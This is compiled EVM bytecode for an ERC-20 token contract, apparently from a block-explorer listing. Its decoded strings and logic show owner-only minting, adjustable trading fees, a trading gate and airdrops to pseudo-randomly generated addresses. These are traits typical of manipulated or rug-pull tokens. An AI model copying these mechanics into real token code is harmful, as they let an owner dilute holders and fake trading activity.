ffffffffffff8111156119d4576119d3612302565b5b604051908082528060200260200182016040528015611a025781602001602082028036833780820191505090505b5090505f805b84811015611aa557858183604051602001611a2593929190613142565b604051602081830303815290604052805190602001205f1c838281518110611a5057611a4f612806565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508180611a959061317e565b9250508080600101915050611a08565b50819250505092915050565b5f444283604051602001611ac793929190613142565b604051602081830303815290604052805190602001205f1c9050919050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c0c9061320f565b60405180910390fd5b611c205f8383611f77565b8060035f828254611c3191906125f2565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611c8491906125f2565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ce8919061212f565b60405180910390a3611cfb5f8383611f7c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d649061329d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd29061332b565b60405180910390fd5b611de6838383611f77565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611e6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e61906133b9565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611efa91906125f2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611f5e919061212f565b60405180910390a3611f71848484611f7c565b50505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611fc382611f81565b611fcd8185611f8b565b9350611fdd818560208601611f9b565b611fe681611fa9565b840191505092915050565b5f6020820190508181035f8301526120098184611fb9565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61204b82612022565b9050919050565b61205b81612041565b8114612065575f80fd5b50565b5f8135905061207681612052565b92915050565b5f819050919050565b61208e8161207c565b8114612098575f80fd5b50565b5f813590506120a981612085565b92915050565b5f80604083850312156120c5576120c461201a565b5b5f6120d285828601612068565b92505060206120e38582860161209b565b9150509250929050565b5f8115159050919050565b612101816120ed565b82525050565b5f60208201905061211a5f8301846120f8565b92915050565b6121298161207c565b82525050565b5f6020820190506121425f830184612120565b92915050565b5f805f6060848603121561215f5761215e61201a565b5b5f61216c86828701612068565b935050602061217d86828701612068565b925050604061218e8682870161209b565b9150509250925092565b6121a181612041565b82525050565b5f6020820190506121ba5f830184612198565b92915050565b5f60ff82169050919050565b6121d5816121c0565b82525050565b5f6020820190506121ee5f8301846121cc565b92915050565b5f61ffff82169050919050565b61220a816121f4565b82525050565b5f6020820190506122235f830184612201565b92915050565b612232816120ed565b811461223c575f80fd5b50565b5f8135905061224d81612229565b92915050565b5f80604083850312156122695761226861201a565b5b5f61227685828601612068565b92505060206122878582860161223f565b9150509250929050565b5f602082840312156122a6576122a561201a565b5b5f6122b384828501612068565b91505092915050565b5f80604083850312156122d2576122d161201a565b5b5f6122df8582860161209b565b92505060206122f08582860161209b565b9150509250929050565b5f80fd5b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61233882611fa9565b810181811067ffffffffffffffff8211171561235757612356612302565b5b80604052505050565b5f612369612011565b9050612375828261232f565b919050565b5f67ffffffffffffffff82111561239457612393612302565b5b61239d82611fa9565b9050602081019050919050565b828183375f83830152505050565b5f6123ca6123c58461237a565b612360565b9050828152602081018484840111156123e6576123e56122fe565b5b6123f18482856123aa565b509392505050565b5f82601f83011261240d5761240c6122fa565b5b813561241d8482602086016123b8565b91505092915050565b5f806040838503121561243c5761243b61201a565b5b5f83013567ffffffffffffffff8111156124595761245861201e565b5b612465858286016123f9565b925050602083013567ffffffffffffffff8111156124865761248561201e565b5b612492858286016123f9565b9150509250929050565b5f80604083850312156124b2576124b161201a565b5b5f6124bf85828601612068565b92505060206124d085828601612068565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061251e57607f821691505b602082108103612531576125306124da565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f612591602883611f8b565b915061259c82612537565b604082019050919050565b5f6020820190508181035f8301526125be81612585565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6125fc8261207c565b91506126078361207c565b925082820190508082111561261f5761261e6125c5565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612659602083611f8b565b915061266482612625565b602082019050919050565b5f6020820190508181035f8301526126868161264d565b9050919050565b7f41697264726f7074696d6573206d7573742062652067726561746572207468615f8201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b5f6126e7602683611f8b565b91506126f28261268d565b604082019050919050565b5f6020820190508181035f830152612714816126db565b9050919050565b7f6e756d416464726573736573206d7573742062652067726561746572207468615f8201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b5f612775602683611f8b565b91506127808261271b565b604082019050919050565b5f6020820190508181035f8301526127a281612769565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6127e08261207c565b91506127eb8361207c565b9250826127fb576127fa6127a9565b5b828206905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561288857808604811115612864576128636125c5565b5b60018516156128735780820291505b808102905061288185612833565b9450612848565b94509492505050565b5f826128a0576001905061295b565b816128ad575f905061295b565b81600181146128c357600281146128cd576128fc565b600191505061295b565b60ff8411156128df576128de6125c5565b5b8360020a9150848211156128f6576128f56125c5565b5b5061295b565b5060208310610133831016604e8410600b84101617156129315782820a90508381111561292c5761292b6125c5565b5b61295b565b61293e848484600161283f565b92509050818404811115612955576129546125c5565b5b81810290505b9392505050565b5f61296c8261207c565b9150612977836121c0565b92506129a47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612891565b905092915050565b5f6129b68261207c565b91506129c18361207c565b92508282026129cf8161207c565b915082820484148315176129e6576129e56125c5565b5b5092915050565b7f544553543a2054686520556e69737761702056322070616972206164647265735f8201527f732063616e6e6f7420626520746865207a65726f20616464726573732e000000602082015250565b5f612a47603d83611f8b565b9150612a52826129ed565b604082019050919050565b5f6020820190508181035f830152612a7481612a3b565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612ad5602583611f8b565b9150612ae082612a7b565b604082019050919050565b5f6020820190508181035f830152612b0281612ac9565b9050919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302612b657fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82612b2a565b612b6f8683612b2a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f612baa612ba5612ba08461207c565b612b87565b61207c565b9050919050565b5f819050919050565b612bc383612b90565b612bd7612bcf82612bb1565b848454612b36565b825550505050565b5f90565b612beb612bdf565b612bf6818484612bba565b505050565b5b81811015612c1957612c0e5f82612be3565b600181019050612bfc565b5050565b601f821115612c5e57612c2f81612b09565b612c3884612b1b565b81016020851015612c47578190505b612c5b612c5385612b1b565b830182612bfb565b50505b505050565b5f82821c905092915050565b5f612c7e5f1984600802612c63565b1980831691505092915050565b5f612c968383612c6f565b9150826002028217905092915050565b612caf82611f81565b67ffffffffffffffff811115612cc857612cc7612302565b5b612cd28254612507565b612cdd828285612c1d565b5f60209050601f831160018114612d0e575f8415612cfc578287015190505b612d068582612c8b565b865550612d6d565b601f198416612d1c86612b09565b5f5b82811015612d4357848901518255600182019150602085019450602081019050612d1e565b86831015612d605784890151612d5c601f891682612c6f565b8355505b6001600288020188555050505b505050505050565b7f496e76616c696420726563697069656e742061646472657373000000000000005f82015250565b5f612da9601983611f8b565b9150612db482612d75565b602082019050919050565b5f6020820190508181035f830152612dd681612d9d565b9050919050565b7f416d6f756e74206d7573742062652067726561746572207468616e207a65726f5f82015250565b5f612e11602083611f8b565b9150612e1c82612ddd565b602082019050919050565b5f6020820190508181035f830152612e3e81612e05565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612e9f602683611f8b565b9150612eaa82612e45565b604082019050919050565b5f6020820190508181035f830152612ecc81612e93565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612f2d602483611f8b565b9150612f3882612ed3565b604082019050919050565b5f6020820190508181035f830152612f5a81612f21565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612fbb602283611f8b565b9150612fc682612f61565b604082019050919050565b5f6020820190508181035f830152612fe881612faf565b9050919050565b7f436f6e74726163743a207472616465206973206e6f74206f70656e21000000005f82015250565b5f613023601c83611f8b565b915061302e82612fef565b602082019050919050565b5f6020820190508181035f83015261305081613017565b9050919050565b7f436f6e74726163743a2074726164696e67206973206e6f7420737461727465645f82015250565b5f61308b602083611f8b565b915061309682613057565b602082019050919050565b5f6020820190508181035f8301526130b88161307f565b9050919050565b5f6130c98261207c565b91506130d48361207c565b9250826130e4576130e36127a9565b5b828204905092915050565b5f6130f98261207c565b91506131048361207c565b925082820390508181111561311c5761311b6125c5565b5b92915050565b5f819050919050565b61313c6131378261207c565b613122565b82525050565b5f61314d828661312b565b60208201915061315d828561312b565b60208201915061316d828461312b565b602082019150819050949350505050565b5f6131888261207c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036131ba576131b96125c5565b5b600182019050919050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6131f9601f83611f8b565b9150613204826131c5565b602082019050919050565b5f6020820190508181035f830152613226816131ed565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613287602583611f8b565b91506132928261322d565b604082019050919050565b5f6020820190508181035f8301526132b48161327b565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613315602383611f8b565b9150613320826132bb565b604082019050919050565b5f6020820190508181035f83015261334281613309565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6133a3602683611f8b565b91506133ae82613349565b604082019050919050565b5f6020820190508181035f8301526133d081613397565b905091905056fea2646970667358221220486cb9437faf8956f94c9690f5bb5b3eaa8645ef1c5ffb95a09d42e9a0e96be564736f6c63430008190033
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106101d8575f3560e01c806370a0823111610102578063a457c2d7116100a0578063d5abeb011161006f578063d5abeb0114610536578063dd62ed3e14610554578063e8442fe614610584578063f2fde38b146105a0576101d8565b8063a457c2d71461049e578063a9059cbb146104ce578063b715af76146104fe578063bf0058d01461051a576101d8565b80638187f516116100dc5780638187f516146104285780638da5cb5b1461044457806395d89b4114610462578063985bdfd114610480576101d8565b806370a08231146103d257806370f7cffc14610402578063715018a61461041e576101d8565b80632b14ca561161017a57806349bd5a5e1161014957806349bd5a5e1461035c5780634c255c971461037a5780634e148e191461039857806358a1aaae146103b4576101d8565b80632b14ca56146102d2578063313ce567146102f0578063395093511461030e578063470624021461033e576101d8565b806318160ddd116101b657806318160ddd1461024857806321326f091461026657806323b872dd1461028457806327c8f835146102b4576101d8565b806306fdde03146101dc578063095ea7b3146101fa578063158ef93e1461022a575b5f80fd5b6101e46105bc565b6040516101f19190611ff1565b60405180910390f35b610214600480360381019061020f91906120af565b61064c565b6040516102219190612107565b60405180910390f35b610232610669565b60405161023f9190612107565b60405180910390f35b61025061067b565b60405161025d919061212f565b60405180910390f35b61026e610684565b60405161027b919061212f565b60405180910390f35b61029e60048036038101906102999190612148565b61068a565b6040516102ab9190612107565b60405180910390f35b6102bc61077c565b6040516102c991906121a7565b60405180910390f35b6102da6107a1565b6040516102e7919061212f565b60405180910390f35b6102f86107c5565b60405161030591906121db565b60405180910390f35b610328600480360381019061032391906120af565b6107cd565b6040516103359190612107565b60405180910390f35b610346610874565b604051610353919061212f565b60405180910390f35b610364610898565b60405161037191906121a7565b60405180910390f35b6103826108be565b60405161038f9190612210565b60405180910390f35b6103b260048036038101906103ad9190612253565b6108c3565b005b6103bc6109af565b6040516103c9919061212f565b60405180910390f35b6103ec60048036038101906103e79190612291565b6109b5565b6040516103f9919061212f565b60405180910390f35b61041c600480360381019061041791906122bc565b6109fb565b005b610426610bdd565b005b610442600480360381019061043d9190612291565b610c7c565b005b61044c610dc2565b60405161045991906121a7565b60405180910390f35b61046a610de9565b6040516104779190611ff1565b60405180910390f35b610488610e79565b6040516104959190612210565b60405180910390f35b6104b860048036038101906104b391906120af565b610e7e565b6040516104c59190612107565b60405180910390f35b6104e860048036038101906104e391906120af565b610f64565b6040516104f59190612107565b60405180910390f35b610518600480360381019061051391906122bc565b610f81565b005b610534600480360381019061052f9190612426565b611027565b005b61053e6110df565b60405161054b919061212f565b60405180910390f35b61056e6004803603810190610569919061249c565b611103565b60405161057b919061212f565b60405180910390f35b61059e600480360381019061059991906120af565b611185565b005b6105ba60048036038101906105b59190612291565b6112fa565b005b6060600480546105cb90612507565b80601f01602080910402602001604051908101604052809291908181526020018280546105f790612507565b80156106425780601f1061061957610100808354040283529160200191610642565b820191905f5260205f20905b81548152906001019060200180831161062557829003601f168201915b5050505050905090565b5f61065f610658611408565b848461140f565b6001905092915050565b60065f9054906101000a900460ff1681565b5f600354905090565b60095481565b5f6106968484846115d2565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6106dd611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508281101561075c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610753906125a7565b60405180910390fd5b61077085610768611408565b85840361140f565b60019150509392505050565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f6012905090565b5f61086a6107d9611408565b848460025f6107e6611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461086591906125f2565b61140f565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606481565b6108cb611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610957576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161094e9061266f565b60405180910390fd5b80600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b60085481565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610a03611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a869061266f565b60405180910390fd5b5f8211610ad1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ac8906126fd565b60405180910390fd5b5f8111610b13576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0a9061278b565b60405180910390fd5b5f4290505f610b2282846119b7565b90505f5b8151811015610bd6575f5b85811015610bc8575f620f424062895440610b61878587610b5291906125f2565b610b5c91906125f2565b611ab1565b610b6b91906127d6565b610b7591906125f2565b9050610bba33858581518110610b8e57610b8d612806565b5b6020026020010151610b9e6107c5565b600a610baa9190612962565b84610bb591906129ac565b6115d2565b508080600101915050610b31565b508080600101915050610b26565b5050505050565b610be5611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c689061266f565b60405180910390fd5b610c7a5f611ae6565b565b610c84611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d079061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7590612a5d565b60405180910390fd5b80600660016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610df890612507565b80601f0160208091040260200160405190810160405280929190818152602001828054610e2490612507565b8015610e6f5780601f10610e4657610100808354040283529160200191610e6f565b820191905f5260205f20905b815481529060010190602001808311610e5257829003601f168201915b5050505050905090565b606481565b5f8060025f610e8b611408565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610f45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3c90612aeb565b60405180910390fd5b610f59610f50611408565b8585840361140f565b600191505092915050565b5f610f77610f70611408565b84846115d2565b6001905092915050565b610f89611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100c9061266f565b60405180910390fd5b81600881905550806009819055505050565b61102f611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146110bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110b29061266f565b60405180910390fd5b81600490816110ca9190612ca6565b5080600590816110da9190612ca6565b505050565b7f000000000000000000000000000000000000000c9f2c9cd04674edea4000000081565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61118d611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611219576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112109061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611287576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127e90612dbf565b60405180910390fd5b5f81116112c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c090612e27565b60405180910390fd5b5f6112d26107c5565b600a6112de9190612962565b826112e991906129ac565b90506112f58382611ba7565b505050565b611302611408565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461138e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113859061266f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f390612eb5565b60405180910390fd5b61140581611ae6565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361147d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147490612f43565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e290612fd1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516115c5919061212f565b60405180910390a3505050565b6001151560065f9054906101000a900460ff16151514611627576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161161e90613039565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff16600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561169657506001151560065f9054906101000a900460ff161515145b1561174e576116a3610dc2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148061170e57506116df610dc2565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b61174d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611744906130a1565b60405180910390fd5b5b5f8190505f73ffffffffffffffffffffffffffffffffffffffff16600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141580156117e357506117b3610dc2565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561182257506117f2610dc2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b156119a6575f600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611887576008549050611941565b600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036119405760011515600a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16151503611939575f905061193f565b60095490505b5b5b5f8111156119a4575f606461ffff16828561195c91906129ac565b61196691906130bf565b9050808461197491906130ef565b92506119a28660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611cff565b505b505b6119b1848483611cff565b50505050565b60605f8267ffffffffffffffff8111156119d4576119d3612302565b5b604051908082528060200260200182016040528015611a025781602001602082028036833780820191505090505b5090505f805b84811015611aa557858183604051602001611a2593929190613142565b604051602081830303815290604052805190602001205f1c838281518110611a5057611a4f612806565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508180611a959061317e565b9250508080600101915050611a08565b50819250505092915050565b5f444283604051602001611ac793929190613142565b604051602081830303815290604052805190602001205f1c9050919050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c0c9061320f565b60405180910390fd5b611c205f8383611f77565b8060035f828254611c3191906125f2565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611c8491906125f2565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ce8919061212f565b60405180910390a3611cfb5f8383611f7c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d649061329d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd29061332b565b60405180910390fd5b611de6838383611f77565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611e6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e61906133b9565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254611efa91906125f2565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611f5e919061212f565b60405180910390a3611f71848484611f7c565b50505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611fc382611f81565b611fcd8185611f8b565b9350611fdd818560208601611f9b565b611fe681611fa9565b840191505092915050565b5f6020820190508181035f8301526120098184611fb9565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61204b82612022565b9050919050565b61205b81612041565b8114612065575f80fd5b50565b5f8135905061207681612052565b92915050565b5f819050919050565b61208e8161207c565b8114612098575f80fd5b50565b5f813590506120a981612085565b92915050565b5f80604083850312156120c5576120c461201a565b5b5f6120d285828601612068565b92505060206120e38582860161209b565b9150509250929050565b5f8115159050919050565b612101816120ed565b82525050565b5f60208201905061211a5f8301846120f8565b92915050565b6121298161207c565b82525050565b5f6020820190506121425f830184612120565b92915050565b5f805f6060848603121561215f5761215e61201a565b5b5f61216c86828701612068565b935050602061217d86828701612068565b925050604061218e8682870161209b565b9150509250925092565b6121a181612041565b82525050565b5f6020820190506121ba5f830184612198565b92915050565b5f60ff82169050919050565b6121d5816121c0565b82525050565b5f6020820190506121ee5f8301846121cc565b92915050565b5f61ffff82169050919050565b61220a816121f4565b82525050565b5f6020820190506122235f830184612201565b92915050565b612232816120ed565b811461223c575f80fd5b50565b5f8135905061224d81612229565b92915050565b5f80604083850312156122695761226861201a565b5b5f61227685828601612068565b92505060206122878582860161223f565b9150509250929050565b5f602082840312156122a6576122a561201a565b5b5f6122b384828501612068565b91505092915050565b5f80604083850312156122d2576122d161201a565b5b5f6122df8582860161209b565b92505060206122f08582860161209b565b9150509250929050565b5f80fd5b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61233882611fa9565b810181811067ffffffffffffffff8211171561235757612356612302565b5b80604052505050565b5f612369612011565b9050612375828261232f565b919050565b5f67ffffffffffffffff82111561239457612393612302565b5b61239d82611fa9565b9050602081019050919050565b828183375f83830152505050565b5f6123ca6123c58461237a565b612360565b9050828152602081018484840111156123e6576123e56122fe565b5b6123f18482856123aa565b509392505050565b5f82601f83011261240d5761240c6122fa565b5b813561241d8482602086016123b8565b91505092915050565b5f806040838503121561243c5761243b61201a565b5b5f83013567ffffffffffffffff8111156124595761245861201e565b5b612465858286016123f9565b925050602083013567ffffffffffffffff8111156124865761248561201e565b5b612492858286016123f9565b9150509250929050565b5f80604083850312156124b2576124b161201a565b5b5f6124bf85828601612068565b92505060206124d085828601612068565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061251e57607f821691505b602082108103612531576125306124da565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602